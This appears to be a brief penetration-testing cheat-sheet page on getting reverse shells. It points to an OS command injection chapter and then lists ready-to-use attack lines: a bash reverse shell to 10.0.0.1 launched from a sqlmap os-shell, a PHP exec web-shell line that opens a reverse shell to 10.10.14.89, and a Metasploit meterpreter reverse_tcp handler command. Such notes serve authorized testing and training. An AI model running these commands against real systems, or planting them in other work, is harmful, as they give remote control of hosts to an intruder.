Go to the mentioned chapter below
{% content-ref url="../web-applications/os-command-injection-rce.md" %} os-command-injection-rce.md {% endcontent-ref %}
From within sqlmap os-shell, using "bash -c"
bash -c "/bin/bash -l > /dev/tcp/10.0.0.1/4242 0<&1 2>&1"
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.89/1234 0>&1'"); ?>
msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST 192.168.45.219;set LPORT 4444;run;"